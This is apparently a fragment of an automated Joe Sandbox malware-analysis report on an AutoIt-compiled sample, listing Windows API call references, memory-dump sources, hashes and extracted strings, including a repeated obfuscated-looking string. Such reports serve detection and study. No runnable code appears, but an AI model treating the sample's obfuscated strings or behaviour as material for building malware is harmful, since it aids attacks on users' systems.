                                                                                  • DeleteObject.GDI32(00000000), ref: 0055D391
                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0055D3DC
                                                                                  • FillRect.USER32(?,?,00000000), ref: 0055D40E
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0055D439
                                                                                    • Part of subcall function 0055D575: GetSysColor.USER32(00000012), ref: 0055D5AE
                                                                                    • Part of subcall function 0055D575: SetTextColor.GDI32(?,?), ref: 0055D5B2
                                                                                    • Part of subcall function 0055D575: GetSysColorBrush.USER32(0000000F), ref: 0055D5C8
                                                                                    • Part of subcall function 0055D575: GetSysColor.USER32(0000000F), ref: 0055D5D3
                                                                                    • Part of subcall function 0055D575: GetSysColor.USER32(00000011), ref: 0055D5F0
                                                                                    • Part of subcall function 0055D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0055D5FE
                                                                                    • Part of subcall function 0055D575: SelectObject.GDI32(?,00000000), ref: 0055D60F
                                                                                    • Part of subcall function 0055D575: SetBkColor.GDI32(?,00000000), ref: 0055D618
                                                                                    • Part of subcall function 0055D575: SelectObject.GDI32(?,?), ref: 0055D625
                                                                                    • Part of subcall function 0055D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0055D644
                                                                                    • Part of subcall function 0055D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0055D65B
                                                                                    • Part of subcall function 0055D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0055D670
                                                                                    • Part of subcall function 0055D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0055D698
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                  • String ID:
                                                                                  • API String ID: 3521893082-0
                                                                                  • Opcode ID: 511250498b769eb79be099a5938fa7ba3044d19aaf2eba3b7c7921e92cc70156
                                                                                  • Instruction ID: af4170080ac466e83b68ad71bd9ef238eff36a0c2c143da3eaa5b374666e3ca4
                                                                                  • Opcode Fuzzy Hash: 511250498b769eb79be099a5938fa7ba3044d19aaf2eba3b7c7921e92cc70156
                                                                                  • Instruction Fuzzy Hash: EF918072408301BFCB109F64EC48E6B7BB9FF95325F100A19F956961E0D771D988EB62
                                                                                  APIs
                                                                                  • DestroyWindow.USER32 ref: 0050B98B
                                                                                  • DeleteObject.GDI32(00000000), ref: 0050B9CD
                                                                                  • DeleteObject.GDI32(00000000), ref: 0050B9D8
                                                                                  • DestroyIcon.USER32(00000000), ref: 0050B9E3
                                                                                  • DestroyWindow.USER32(00000000), ref: 0050B9EE
                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0056D2AA
                                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0056D2E3
                                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0056D711
                                                                                    • Part of subcall function 0050B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0050B759,?,00000000,?,?,?,?,0050B72B,00000000,?), ref: 0050BA58
                                                                                  • SendMessageW.USER32 ref: 0056D758
                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0056D76F
                                                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 0056D785
                                                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 0056D790
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                  • String ID: 0
                                                                                  • API String ID: 464785882-4108050209
                                                                                  • Opcode ID: 24d919faeb747e35720a68395ff92289b4fd866aab2c374fe4b496d7523e0a4b
                                                                                  • Instruction ID: 5eb95c2cacd3ea88c7aa933927bbb51813c88e2ff717361d35802262254cac64
                                                                                  • Opcode Fuzzy Hash: 24d919faeb747e35720a68395ff92289b4fd866aab2c374fe4b496d7523e0a4b
                                                                                  • Instruction Fuzzy Hash: 45127F70A042029FDB15CF18C888BA9BFF5FF55304F144969E989DB692C731EC85DBA1
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0053DBD6
                                                                                  • GetDriveTypeW.KERNEL32(?,0058DC54,?,\\.\,0058DC00), ref: 0053DCC3
                                                                                  • SetErrorMode.KERNEL32(00000000,0058DC54,?,\\.\,0058DC00), ref: 0053DE29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$DriveType
                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                  • API String ID: 2907320926-4222207086
                                                                                  • Opcode ID: 886f324418335e20a8148d86d50c77ba3a03437321a99877cf685ce2e201a963
                                                                                  • Instruction ID: f82c3941404a4106407fed09b9f38d4dd6b1aa8e71a44e410bdf6cbcff8d79ff
                                                                                  • Opcode Fuzzy Hash: 886f324418335e20a8148d86d50c77ba3a03437321a99877cf685ce2e201a963
                                                                                  • Instruction Fuzzy Hash: 4F517D3024830AABC710EB10E99282DFFB5FB95B48F205C1AF5479B291DB60DD45DA72
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsnicmp
                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                  • API String ID: 1038674560-86951937
                                                                                  • Opcode ID: b3230e0d588424df8e094a1a277eebd6aa6d058aa70e22b07c56e988531ef983
                                                                                  • Instruction ID: 0e55138d602f666ac82137afde3bd520cb3c5ac48b85ec6f11b3f40451499504
                                                                                  • Opcode Fuzzy Hash: b3230e0d588424df8e094a1a277eebd6aa6d058aa70e22b07c56e988531ef983
                                                                                  • Instruction Fuzzy Hash: 2081F73064060E7ADB20BB64DD87FBF7FA8BF55304F04402AFA05A71C6EB659941C6A9
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0055C788
                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0055C83E
                                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 0055C859
                                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0055CB15
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window
                                                                                  • String ID: 0
                                                                                  • API String ID: 2326795674-4108050209
                                                                                  • Opcode ID: 486cc0c1f29511c70198615e175115c243bb963fd9ba7cb3dd30b0d6a0022912
                                                                                  • Instruction ID: 0394a0b1f8935c4c72b81e0fa9ddcb4c3c8cbff2ac9a9cb1daf1973c18978b52
                                                                                  • Opcode Fuzzy Hash: 486cc0c1f29511c70198615e175115c243bb963fd9ba7cb3dd30b0d6a0022912
                                                                                  • Instruction Fuzzy Hash: F6F1A371104301AFD7218F24CCA9BAABFF4FF49356F040A1EF999962A1C774D948DBA1
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?,0058DC00), ref: 00556449
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper
                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                  • API String ID: 3964851224-45149045
                                                                                  • Opcode ID: 8767906f2a48592bc6f12daae472af6950973d67b03814b6e562089ad7b730e8
                                                                                  • Instruction ID: 051b31d633bfa78c29175deb821c6aa4701105801ba078c0701c1309db68ebe7
                                                                                  • Opcode Fuzzy Hash: 8767906f2a48592bc6f12daae472af6950973d67b03814b6e562089ad7b730e8
                                                                                  • Instruction Fuzzy Hash: 3EC17D302042868BDA04EF10C565A6E7FE5BFD5345F50485EFC865B2E2EB25ED4ECB82
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000012), ref: 0055D5AE
                                                                                  • SetTextColor.GDI32(?,?), ref: 0055D5B2
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0055D5C8
                                                                                  • GetSysColor.USER32(0000000F), ref: 0055D5D3
                                                                                  • CreateSolidBrush.GDI32(?), ref: 0055D5D8
                                                                                  • GetSysColor.USER32(00000011), ref: 0055D5F0
                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0055D5FE
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0055D60F
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0055D618
                                                                                  • SelectObject.GDI32(?,?), ref: 0055D625
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0055D644
                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0055D65B
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0055D670
                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0055D698
                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0055D6BF
                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 0055D6DD
                                                                                  • DrawFocusRect.USER32(?,?), ref: 0055D6E8
                                                                                  • GetSysColor.USER32(00000011), ref: 0055D6F6
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0055D6FE
                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0055D712
                                                                                  • SelectObject.GDI32(?,0055D2A5), ref: 0055D729
                                                                                  • DeleteObject.GDI32(?), ref: 0055D734
                                                                                  • SelectObject.GDI32(?,?), ref: 0055D73A
                                                                                  • DeleteObject.GDI32(?), ref: 0055D73F
                                                                                  • SetTextColor.GDI32(?,?), ref: 0055D745
                                                                                  • SetBkColor.GDI32(?,?), ref: 0055D74F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                  • String ID:
                                                                                  • API String ID: 1996641542-0
                                                                                  • Opcode ID: 2af3a4f348d555559edcc5cf54ac6dfaaaff4bf1ca3c9f2e8cb7467667d9469f
                                                                                  • Instruction ID: 58704045c1241e1d5f799dd2aa2a59f5c9dd4a9a69eaa678649edc2a8f5dbdf8
                                                                                  • Opcode Fuzzy Hash: 2af3a4f348d555559edcc5cf54ac6dfaaaff4bf1ca3c9f2e8cb7467667d9469f
                                                                                  • Instruction Fuzzy Hash: 2F514072900208BFDF109FA4EC48EAE7B79FF58321F104515F919AB2A1D7759A44EF60
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0055B7B0
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0055B7C1
                                                                                  • CharNextW.USER32(0000014E), ref: 0055B7F0
                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0055B831
                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0055B847
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0055B858
                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0055B875
                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 0055B8C7
                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0055B8DD
                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 0055B90E
                                                                                  • _memset.LIBCMT ref: 0055B933
                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0055B97C
                                                                                  • _memset.LIBCMT ref: 0055B9DB
                                                                                  • SendMessageW.USER32 ref: 0055BA05
                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 0055BA5D
                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 0055BB0A
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0055BB2C
                                                                                  • GetMenuItemInfoW.USER32(?), ref: 0055BB76
                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0055BBA3
                                                                                  • DrawMenuBar.USER32(?), ref: 0055BBB2
                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 0055BBDA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                  • String ID: 0
                                                                                  • API String ID: 1073566785-4108050209
                                                                                  • Opcode ID: b8e67ef56796a28f219f49bbc07770d49f006f9224a0b0dc509398444f9f4db0
                                                                                  • Instruction ID: a3dc3090bd968c89a0c6482a8b01472cef64b6b2280bf69d95e29bd9d06ce266
                                                                                  • Opcode Fuzzy Hash: b8e67ef56796a28f219f49bbc07770d49f006f9224a0b0dc509398444f9f4db0
                                                                                  • Instruction Fuzzy Hash: 60E19C71900209AFEB209F61CC98EEE7F78FF44721F108156FD19AA290D7709A89DF60
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Foreground
                                                                                  • String ID: ACTIVE$ALL$CLASS$H+Z$HANDLE$INSTANCE$L+Z$LAST$P+Z$REGEXPCLASS$REGEXPTITLE$T+Z$TITLE
                                                                                  • API String ID: 62970417-2349218558
                                                                                  • Opcode ID: a7c9a4866b096ced62e4f3d7f88f1d14b81d8a0b510a19ede34fd2ee5f0e0087
                                                                                  • Instruction ID: 96a42c012777f3b6fb1042e47d530d329a97708f1e6a382df80a4de1ca480c6e
                                                                                  • Opcode Fuzzy Hash: a7c9a4866b096ced62e4f3d7f88f1d14b81d8a0b510a19ede34fd2ee5f0e0087
                                                                                  • Instruction Fuzzy Hash: 02D1E630208A47ABCB04EF10C8919AEBFB0BF55344F104E1DF556575A1DB34ED9ADBA2
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(?), ref: 0055778A
                                                                                  • GetDesktopWindow.USER32 ref: 0055779F
                                                                                  • GetWindowRect.USER32(00000000), ref: 005577A6
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00557808
                                                                                  • DestroyWindow.USER32(?), ref: 00557834
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0055785D
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0055787B
                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 005578A1
                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 005578B6
                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 005578C9
                                                                                  • IsWindowVisible.USER32(?), ref: 005578E9
                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00557904
                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00557918
                                                                                  • GetWindowRect.USER32(?,?), ref: 00557930
                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00557956
                                                                                  • GetMonitorInfoW.USER32 ref: 00557970
                                                                                  • CopyRect.USER32(?,?), ref: 00557987
                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 005579F2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                  • String ID: ($0$tooltips_class32
                                                                                  • API String ID: 698492251-4156429822
                                                                                  • Opcode ID: 0c8b66bccd4ca4876035757dffc07c73843f2c6c78c0bf9b852853241a1b49eb
                                                                                  • Instruction ID: dcf1a8e31cf7e8a24ec05fac0267e404e6d163633b402793f82c4ebfc03e42c0
                                                                                  • Opcode Fuzzy Hash: 0c8b66bccd4ca4876035757dffc07c73843f2c6c78c0bf9b852853241a1b49eb
                                                                                  • Instruction Fuzzy Hash: 29B1C071608305AFDB00DF64D858B6ABBF5FF88311F00891EF9999B291D770E808CBA5
                                                                                  APIs
                                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00536CFB
                                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00536D21
                                                                                  • _wcscpy.LIBCMT ref: 00536D4F
                                                                                  • _wcscmp.LIBCMT ref: 00536D5A
                                                                                  • _wcscat.LIBCMT ref: 00536D70
                                                                                  • _wcsstr.LIBCMT ref: 00536D7B
                                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00536D97
                                                                                  • _wcscat.LIBCMT ref: 00536DE0
                                                                                  • _wcscat.LIBCMT ref: 00536DE7
                                                                                  • _wcsncpy.LIBCMT ref: 00536E12
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                  • API String ID: 699586101-1459072770
                                                                                  • Opcode ID: 242bb05a477f0fe6ab0cf501528985995a75111755e97a15e74914c9601d6ef2
                                                                                  • Instruction ID: c6e5030e020c0bebbdc9ad9d9ad091039841f68226220d1d04356a294839b952
                                                                                  • Opcode Fuzzy Hash: 242bb05a477f0fe6ab0cf501528985995a75111755e97a15e74914c9601d6ef2
                                                                                  • Instruction Fuzzy Hash: B141F471600206BBEB10BB64CC4BEBF7FBCFF81714F004469F901A61C2EAB49A4597A5
                                                                                  APIs
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0050A939
                                                                                  • GetSystemMetrics.USER32(00000007), ref: 0050A941
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0050A96C
                                                                                  • GetSystemMetrics.USER32(00000008), ref: 0050A974
                                                                                  • GetSystemMetrics.USER32(00000004), ref: 0050A999
                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0050A9B6
                                                                                  • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0050A9C6
                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0050A9F9
                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0050AA0D
                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 0050AA2B
                                                                                  • GetStockObject.GDI32(00000011), ref: 0050AA47
                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0050AA52
                                                                                    • Part of subcall function 0050B63C: GetCursorPos.USER32(000000FF), ref: 0050B64F
                                                                                    • Part of subcall function 0050B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0050B66C
                                                                                    • Part of subcall function 0050B63C: GetAsyncKeyState.USER32(00000001), ref: 0050B691
                                                                                    • Part of subcall function 0050B63C: GetAsyncKeyState.USER32(00000002), ref: 0050B69F
                                                                                  • SetTimer.USER32(00000000,00000000,00000028,0050AB87), ref: 0050AA79
                                                                                  Strings
                                                                                  • vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv, xrefs: 0050A8CC
                                                                                  • AutoIt v3 GUI, xrefs: 0050A9F1
                                                                                  Similarity
                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                  • String ID: AutoIt v3 GUI$vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv
                                                                                  • API String ID: 1458621304-1895366553
                                                                                  • Opcode ID: 5181b77ac92258d43bf14f1abaa8162bf4f2123179847216b9cadfebdcdbf55e
                                                                                  • Instruction ID: ca402e203dc32fac1ec2eea08e537e343a84a3ba163be83a58866b6f8a7b3be0
                                                                                  • Opcode Fuzzy Hash: 5181b77ac92258d43bf14f1abaa8162bf4f2123179847216b9cadfebdcdbf55e
                                                                                  • Instruction Fuzzy Hash: C7B17871A0020AAFDB14DFA8DC49BAE7BB4FF58314F114229FA15A72D0DB34A840DB65
